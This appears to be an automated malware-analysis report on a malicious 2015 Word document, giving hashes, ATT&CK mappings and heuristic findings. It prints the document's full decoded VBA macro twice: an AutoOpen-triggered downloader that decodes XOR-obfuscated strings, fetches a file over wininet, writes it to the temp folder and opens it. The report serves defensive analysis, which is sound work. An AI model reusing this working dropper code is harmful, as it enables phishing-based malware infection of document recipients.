Office (OLE) malware analysis — malicious · 7f9ad5e44e357130

MALICIOUS

Office (OLE)

74.0 KB Created: 2015-05-01 06:32:00 Authoring application: Microsoft Office Word First seen: 2015-05-10

MD5: 973e8eac9bb4ae456f0a20f2e9a07b7e SHA-1: 96561f046f9002e5e47f613a049d662d2f6575a7 SHA-256: 7f9ad5e44e357130fd8dcfdceb01342b011106d41b92a92792b950882a938187

128 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers the execution of other VBA functions, including one that uses 'CreateObject'. This indicates the macro is likely designed to download and execute a secondary payload. The presence of legacy WordBasic auto-exec markers further supports the malicious intent.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set RAYFORD = CreateObject(SHERWOOD)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8422 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8422 bytes
SHA-256: `3dd0d2b0c703adb821a3574b698ebe4551ff3684413b59c2b5b8951bb4fe72fd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub COLTON(FELIX As Long) JOSPEH End Sub Sub autoopen() COLTON (298) End Sub Attribute VB_Name = "ANDREAS" Public Sub JOSPEH() Dim BERT As Long Dim TONEY As Long For TONEY = 33 To 36 TONEY = TONEY + TONEY Next TONEY DOMINGO (8.2) End Sub Public Function HAYWOOD(RENATO As Integer) As String HAYWOOD = FRANKLYN(JOHNSON) RENATO = RENATO + 55 HAYWOOD = StrReverse(HAYWOOD) RENATO = 0 End Function Public Function GASTON(ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String GASTON = ChrW(GAYLORD Xor MANUAL) End Function Public Function LOWELL(BRODNATHANIAL As String) As Integer LOWELL = FreeFile End Function Attribute VB_Name = "WALTON" Public Const RUEBEN = 5555 Public Const BARRETTK As String = "ARNOLDO" Public Const HARLAND = 1 Public Const ELIJAH = &H4000000 Sub DOMINGO(SANTOS As Double) AUBREY ("DEANGELOFILIBERTO") End Sub Public Function WARNER(ByRef ARLEN As Object) As Object Set WARNER = ARLEN.GetSpecialFolder(2) End Function Public Function MICHAL(ByRef TITUS As Object, ByRef AMBROSE As String, CRISTOBAL As Double) As Boolean Dim SHERWOOD As String SHERWOOD = FRANKLYN(BRITT) Set RAYFORD = CreateObject(SHERWOOD) Dim RAYMON As Integer RAYMON = RAYFORD.Open(TITUS & AMBROSE) End Function Public Function AUBREY(SANTIAGO As String) Dim LESLEY As Integer LESLEY = 1 DARELL LESLEY * 2 LESLEY = LESLEY + 4 End Function Attribute VB_Name = "RHETT" #If VBA7 And Win64 Then Public Declare _ PtrSafe Function _ EMMITT Lib "wininet.dll" Alias _ "InternetOpenA" (ByVal RALEIGH As String, ByVal GARFIELD As Long, ByVal MAXIMO As String, ByVal MCKINLEY As String, ByVal TEODORO As Long) As LongPtr #End If Public Function JORDON(BRODNATHANIAL As String) As Long JORDON = Len(BRODNATHANIAL) End Function Public Function DARELL(DORSEY As Double) Dim PORTER As Object Dim ELDEN As Long For ELDEN = 14 To 15 ELDEN = ELDEN + 15 Next ELDEN Dim HAI As Object For ELDEN = 10 To 20 ELDEN = ELDEN + 60 Next ELDEN Set HAI = EZEKIEL("") ELDEN = ELDEN + 5 Dim LINDSAY As Boolean If ELDEN > ELDEN * 100 Then End LINDSAY = LYNWOOD(PORTER, HAI) DORSEY = DORSEY + 24 End Function Attribute VB_Name = "PALMER" #If VBA7 And Win64 Then Public _ Declare _ PtrSafe _ Function _ RASHAD Lib _ "wininet.dll" Alias "InternetReadFile" (ByVal WHITNEY As LongPtr, ByVal BARRETT As String, ByVal JAMEY As Long, VALENTINE As Long) As Integer Public _ Declare _ PtrSafe _ Function _ ABRAM Lib _ "wininet.dll" Alias "InternetOpenUrlA" (ByVal ADALBERTO As LongPtr, ByVal CHUNG As String, ByVal FERMIN As String, ByVal HIPOLITO As Long, ByVal ISAIAS As Long, ByVal TYRON As Long) As LongPtr #End If Public Function GILBERTO(ByRef NATHANIAL As String, ByRef CLAUD As Long) As Integer GILBERTO = AscW(DANILO(17, NATHANIAL, ((CLAUD Mod JORDON(NATHANIAL)) + 1), 1)) End Function #If VBA7 And Win64 Then Public Function CEDRICK(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean #Else Public Function CEDRICK(ByRef GRADY As Long, NOAH As Long) As Boolean #End If Dim PHIL As Double Dim GUADALUPE As String Dim CLARK As Long GUADALUPE = FRANKLYN(LEIGH) For PHIL = 14 To 18 PHIL = PHIL + 2.1 Next PHIL GRADY = ABRAM(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0) CEDRICK = True End Function Public Function ARDEN() As String ARDEN = MOSE & ISREAL End Function Attribute VB_Name = "DOUGLASS" Public Const GAYLE = "GARRET" #If VBA7 And Win64 Then #Else Public Declare Function FAUSTO Lib "wininet.dll" _ Alias "InternetCloseHandle" (ByRef LAWERENCE As Long) As Long Public Declare Function EMMITT Lib "wininet.dll" _ Alias "InternetOpenA" (ByVal RALEIGH As String, ByVal GARFIELD As Long, ByVal MAXIMO As String, ByVal MCKINLEY As String, ByVal TEODORO As Long) As Long Public Declare Function RASHAD Lib "wininet.dll" _ Alias "InternetReadFile" (ByVal WHITNEY As Long, ByVal BARRETT As String, ByVal JAMEY As Long, VALENTINE As Long) As Integer Public Declare Function ABRAM Lib "wininet.dll" _ Alias "InternetOpenUrlA" (ByVal ADALBERTO As Long, ByVal CHUNG As String, ByVal FERMIN As String, ByVal HIPOLITO As Long, ByVal ISAIAS As Long, ByVal TYRON As Long) As Long #End If Public Function DANILO(SAMMY As Long, ByRef BRODNATHANIAL As String, ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String DANILO = Mid$(BRODNATHANIAL, GAYLORD, MANUAL) SAMMY = SAMMY + 52 End Function #If VBA7 _ And Win64 Then Public Function WALLY() As LongPtr #Else Public Function WALLY() As Long #End If WALLY = EMMITT(BARRETTK, HARLAND, vbNullString, vbNullString, 0) End Function Public Function EZEKIEL(ISMAEL As String) As Object Set EZEKIEL = CreateObject _ (HAYWOOD(44)) End Function Attribute VB_Name = "CORDELL" Public Const BRITT = "123C2D2D226F043C43282C2F543A283B26" Public Const BENEDICT = "1D272D332B232A27066A203450" Public Const LEIGH = "29203C31746E6A205231372959392E3B2C37273322255D2D246256212C7B7E747A6E717A1D213D29" Public Const JOHNSON = "35372D2B2C0E282947373C1F5022281266262028313C5A36261F" Public Const MOSE = "NATHAN" Public Const ISREAL = "AEL3DEL5" Public Function FRANKLYN(REYNALDO As String) As String Dim GAYLORD As Integer Dim MANUAL As Integer Dim NATHANIAL As String NATHANIAL = ARDEN Dim KRISTOFER As Integer For KRISTOFER = 43 To 44 If KRISTOFER = 55 Then End Next KRISTOFER Dim CLAUD As Long Dim TERENCE As String For CLAUD = 1 To (JORDON(REYNALDO) / 2) GAYLORD = FRANCESCO(REYNALDO, CLAUD) MANUAL = GILBERTO(NATHANIAL, CLAUD) TERENCE = TERENCE + GASTON(GAYLORD, MANUAL) Next CLAUD FRANKLYN = TERENCE End Function Attribute VB_Name = "ELLSWORTH" Public Function FRANCESCO(ByRef REYNALDO As String, ByRef CLAUD As Long) As Integer FRANCESCO = Val("&H" & (DANILO(12, REYNALDO, MODESTO(CLAUD), 2))) End Function Public Function LYNWOOD(ByRef TITUS As Object, ByRef HOMER As Object) As Boolean Dim RENALDO As Long Set TITUS = WARNER(EZEKIEL("")) Dim JODY Dim AMBROSE As String AMBROSE = FRANKLYN(BENEDICT) For RENALDO = 11 To 33 RENALDO = RENALDO * 4 Next RENALDO JODY = TITUS & AMBROSE If ANTIONE(475, JODY) Then End If LYNWOOD = MICHAL(TITUS, AMBROSE, 11) End Function Public Function MODESTO(ByRef CLAUD As Long) As Long MODESTO = (2 * CLAUD) - 1 End Function Attribute VB_Name = "VIRGILIO" #If VBA7 And Win64 Then Public Declare _ PtrSafe Function _ FAUSTO Lib "wininet.dll" Alias _ "InternetCloseHandle" (ByRef LAWERENCE As LongPtr) As Long #End If Public Function ANTIONE(KOREY As Double, ByVal MALCOM As String) As Boolean Dim LAMONT As Long Dim BARRETT As String * RUEBEN, RALEIGH As String Dim MILES As Integer, MICAH As Double #If VBA7 And Win64 Then Dim KASEY As LongPtr, BENTON As LongPtr #Else Dim KASEY As Long, BENTON As Long #End If KASEY = WALLY If KASEY = 0 Then Exit Function End If Dim LUCAS As Boolean If CEDRICK(BENTON, KASEY) Then End If If BENTON = 0 Then CRISTOPHER = 0 Else RASHAD BENTON, BARRETT, RUEBEN, LAMONT RALEIGH = BARRETT Dim BOYCE As Integer BOYCE = 0 BOYCE = BOYCE + 33 If BOYCE > BOYCE + 40 Then End Do While LAMONT <> 0 RASHAD BENTON, BARRETT, RUEBEN, LAMONT RALEIGH = RALEIGH + Mid(BARRETT, 1, LAMONT) Loop CRISTOPHER = JORDON(RALEIGH): _ CORTEZ = LOWELL("JERRY") BOYCE = BOYCE + 46 Open _ MALCOM For Binary As #CORTEZ Put #CORTEZ, , RALEIGH If BOYCE < 0 Then End Close #CORTEZ End If FAUSTO BENTON FAUSTO KASEY RALEIGH = "" If CRISTOPHER Then ANTIONE = True End If End Function

SHA-256: 3dd0d2b0c703adb821a3574b698ebe4551ff3684413b59c2b5b8951bb4fe72fd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub COLTON(FELIX As Long)
JOSPEH
End Sub

Sub autoopen()
COLTON (298)
End Sub


Attribute VB_Name = "ANDREAS"


Public Sub JOSPEH()
        Dim BERT As Long

    Dim TONEY As Long
For TONEY = 33 To 36
TONEY = TONEY + TONEY
Next TONEY

DOMINGO (8.2)

End Sub



Public Function HAYWOOD(RENATO As Integer) As String
HAYWOOD = FRANKLYN(JOHNSON)
RENATO = RENATO + 55
HAYWOOD = StrReverse(HAYWOOD)
RENATO = 0
End Function

Public Function GASTON(ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
    GASTON = ChrW(GAYLORD Xor MANUAL)
End Function


Public Function LOWELL(BRODNATHANIAL As String) As Integer
    LOWELL = FreeFile
End Function


Attribute VB_Name = "WALTON"


Public Const RUEBEN = 5555
Public Const BARRETTK As String = "ARNOLDO"
Public Const HARLAND = 1
Public Const ELIJAH = &H4000000



Sub DOMINGO(SANTOS As Double)

AUBREY ("DEANGELOFILIBERTO")
End Sub


Public Function WARNER(ByRef ARLEN As Object) As Object
Set WARNER = ARLEN.GetSpecialFolder(2)
End Function



Public Function MICHAL(ByRef TITUS As Object, ByRef AMBROSE As String, CRISTOBAL As Double) As Boolean
Dim SHERWOOD As String
SHERWOOD = FRANKLYN(BRITT)
Set RAYFORD = CreateObject(SHERWOOD)
Dim RAYMON As Integer
RAYMON = RAYFORD.Open(TITUS & AMBROSE)
End Function

Public Function AUBREY(SANTIAGO As String)
Dim LESLEY As Integer
LESLEY = 1
DARELL LESLEY * 2
LESLEY = LESLEY + 4
End Function







Attribute VB_Name = "RHETT"
#If VBA7 And Win64 Then
Public Declare _
PtrSafe Function _
EMMITT Lib "wininet.dll" Alias _
"InternetOpenA" (ByVal RALEIGH As String, ByVal GARFIELD As Long, ByVal MAXIMO As String, ByVal MCKINLEY As String, ByVal TEODORO As Long) As LongPtr
#End If

Public Function JORDON(BRODNATHANIAL As String) As Long
JORDON = Len(BRODNATHANIAL)
End Function


Public Function DARELL(DORSEY As Double)

Dim PORTER As Object


    Dim ELDEN As Long
For ELDEN = 14 To 15
ELDEN = ELDEN + 15
Next ELDEN
    

Dim HAI  As Object


For ELDEN = 10 To 20
ELDEN = ELDEN + 60
Next ELDEN
    

Set HAI = EZEKIEL("")
ELDEN = ELDEN + 5
Dim LINDSAY As Boolean

If ELDEN > ELDEN * 100 Then End
LINDSAY = LYNWOOD(PORTER, HAI)
DORSEY = DORSEY + 24
End Function



Attribute VB_Name = "PALMER"
#If VBA7 And Win64 Then
Public _
Declare _
PtrSafe _
Function _
RASHAD Lib _
"wininet.dll" Alias "InternetReadFile" (ByVal WHITNEY As LongPtr, ByVal BARRETT As String, ByVal JAMEY As Long, VALENTINE As Long) As Integer
Public _
Declare _
PtrSafe _
Function _
ABRAM Lib _
"wininet.dll" Alias "InternetOpenUrlA" (ByVal ADALBERTO As LongPtr, ByVal CHUNG As String, ByVal FERMIN As String, ByVal HIPOLITO As Long, ByVal ISAIAS As Long, ByVal TYRON As Long) As LongPtr
#End If

Public Function GILBERTO(ByRef NATHANIAL As String, ByRef CLAUD As Long) As Integer
GILBERTO = AscW(DANILO(17, NATHANIAL, ((CLAUD Mod JORDON(NATHANIAL)) + 1), 1))
End Function




#If VBA7 And Win64 Then
       Public Function CEDRICK(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
    #Else
       Public Function CEDRICK(ByRef GRADY As Long, NOAH As Long) As Boolean
    #End If
        Dim PHIL As Double
Dim GUADALUPE As String
Dim CLARK As Long
    GUADALUPE = FRANKLYN(LEIGH)

For PHIL = 14 To 18
PHIL = PHIL + 2.1
Next PHIL
    GRADY = ABRAM(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
    CEDRICK = True
End Function

Public Function ARDEN() As String
ARDEN = MOSE & ISREAL
End Function




Attribute VB_Name = "DOUGLASS"




Public Const GAYLE = "GARRET"

#If VBA7 And Win64 Then
#Else
Public Declare Function FAUSTO Lib "wininet.dll" _
Alias "InternetCloseHandle" (ByRef LAWERENCE As Long) As Long
Public Declare Function EMMITT Lib "wininet.dll" _
Alias "InternetOpenA" (ByVal RALEIGH As String, ByVal GARFIELD As Long, ByVal MAXIMO As String, ByVal MCKINLEY As String, ByVal TEODORO As Long) As Long
Public Declare Function RASHAD Lib "wininet.dll" _
Alias "InternetReadFile" (ByVal WHITNEY As Long, ByVal BARRETT As String, ByVal JAMEY As Long, VALENTINE As Long) As Integer
Public Declare Function ABRAM Lib "wininet.dll" _
Alias "InternetOpenUrlA" (ByVal ADALBERTO As Long, ByVal CHUNG As String, ByVal FERMIN As String, ByVal HIPOLITO As Long, ByVal ISAIAS As Long, ByVal TYRON As Long) As Long
#End If


Public Function DANILO(SAMMY As Long, ByRef BRODNATHANIAL As String, ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
    DANILO = Mid$(BRODNATHANIAL, GAYLORD, MANUAL)
    SAMMY = SAMMY + 52
End Function
#If VBA7 _
    And Win64 Then
Public Function WALLY() As LongPtr
 #Else
Public Function WALLY() As Long
 
 #End If
 
 WALLY = EMMITT(BARRETTK, HARLAND, vbNullString, vbNullString, 0)
End Function


Public Function EZEKIEL(ISMAEL As String) As Object
Set EZEKIEL = CreateObject _
(HAYWOOD(44))
End Function





Attribute VB_Name = "CORDELL"
Public Const BRITT = "123C2D2D226F043C43282C2F543A283B26"
Public Const BENEDICT = "1D272D332B232A27066A203450"

Public Const LEIGH = "29203C31746E6A205231372959392E3B2C37273322255D2D246256212C7B7E747A6E717A1D213D29"
Public Const JOHNSON = "35372D2B2C0E282947373C1F5022281266262028313C5A36261F"
Public Const MOSE = "NATHAN"
Public Const ISREAL = "AEL3DEL5"



Public Function FRANKLYN(REYNALDO As String) As String
    
    Dim GAYLORD As Integer
    Dim MANUAL As Integer
    Dim NATHANIAL As String
    NATHANIAL = ARDEN
    
    Dim KRISTOFER As Integer
For KRISTOFER = 43 To 44
If KRISTOFER = 55 Then End
Next KRISTOFER
    
    Dim CLAUD As Long
    Dim TERENCE As String
    For CLAUD = 1 To (JORDON(REYNALDO) / 2)
        GAYLORD = FRANCESCO(REYNALDO, CLAUD)
        MANUAL = GILBERTO(NATHANIAL, CLAUD)
        TERENCE = TERENCE + GASTON(GAYLORD, MANUAL)
    Next CLAUD
   FRANKLYN = TERENCE
End Function

Attribute VB_Name = "ELLSWORTH"

Public Function FRANCESCO(ByRef REYNALDO As String, ByRef CLAUD As Long) As Integer
 FRANCESCO = Val("&H" & (DANILO(12, REYNALDO, MODESTO(CLAUD), 2)))
End Function


Public Function LYNWOOD(ByRef TITUS As Object, ByRef HOMER As Object) As Boolean

Dim RENALDO As Long
Set TITUS = WARNER(EZEKIEL(""))

Dim JODY

Dim AMBROSE As String
AMBROSE = FRANKLYN(BENEDICT)

For RENALDO = 11 To 33
RENALDO = RENALDO * 4
Next RENALDO
JODY = TITUS & AMBROSE


If ANTIONE(475, JODY) Then
End If


LYNWOOD = MICHAL(TITUS, AMBROSE, 11)

End Function

Public Function MODESTO(ByRef CLAUD As Long) As Long
 MODESTO = (2 * CLAUD) - 1
End Function


Attribute VB_Name = "VIRGILIO"

#If VBA7 And Win64 Then
Public Declare _
PtrSafe Function _
FAUSTO Lib "wininet.dll" Alias _
"InternetCloseHandle" (ByRef LAWERENCE As LongPtr) As Long
#End If




Public Function ANTIONE(KOREY As Double, ByVal MALCOM As String) As Boolean
    
        Dim LAMONT As Long
    Dim BARRETT As String * RUEBEN, RALEIGH As String
    Dim MILES As Integer, MICAH As Double
    #If VBA7 And Win64 Then
        Dim KASEY As LongPtr, BENTON As LongPtr
    #Else
        Dim KASEY As Long, BENTON As Long
    #End If

    KASEY = WALLY
    If KASEY = 0 Then
        Exit Function
    End If
    Dim LUCAS As Boolean
    
    If CEDRICK(BENTON, KASEY) Then
    End If
    If BENTON = 0 Then
        CRISTOPHER = 0
    Else
        RASHAD BENTON, BARRETT, RUEBEN, LAMONT
        RALEIGH = BARRETT
          Dim BOYCE As Integer
          BOYCE = 0
          BOYCE = BOYCE + 33
If BOYCE > BOYCE + 40 Then End
        Do While LAMONT <> 0
            RASHAD BENTON, BARRETT, RUEBEN, LAMONT
                    RALEIGH = RALEIGH + Mid(BARRETT, 1, LAMONT)
        Loop
             CRISTOPHER = JORDON(RALEIGH): _
             CORTEZ = LOWELL("JERRY")
        BOYCE = BOYCE + 46
        
        Open _
        MALCOM For Binary As #CORTEZ
        Put #CORTEZ, , RALEIGH
    If BOYCE < 0 Then End
        Close #CORTEZ
    End If
    FAUSTO BENTON
    FAUSTO KASEY
    RALEIGH = ""
    If CRISTOPHER Then
        ANTIONE = True
    End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.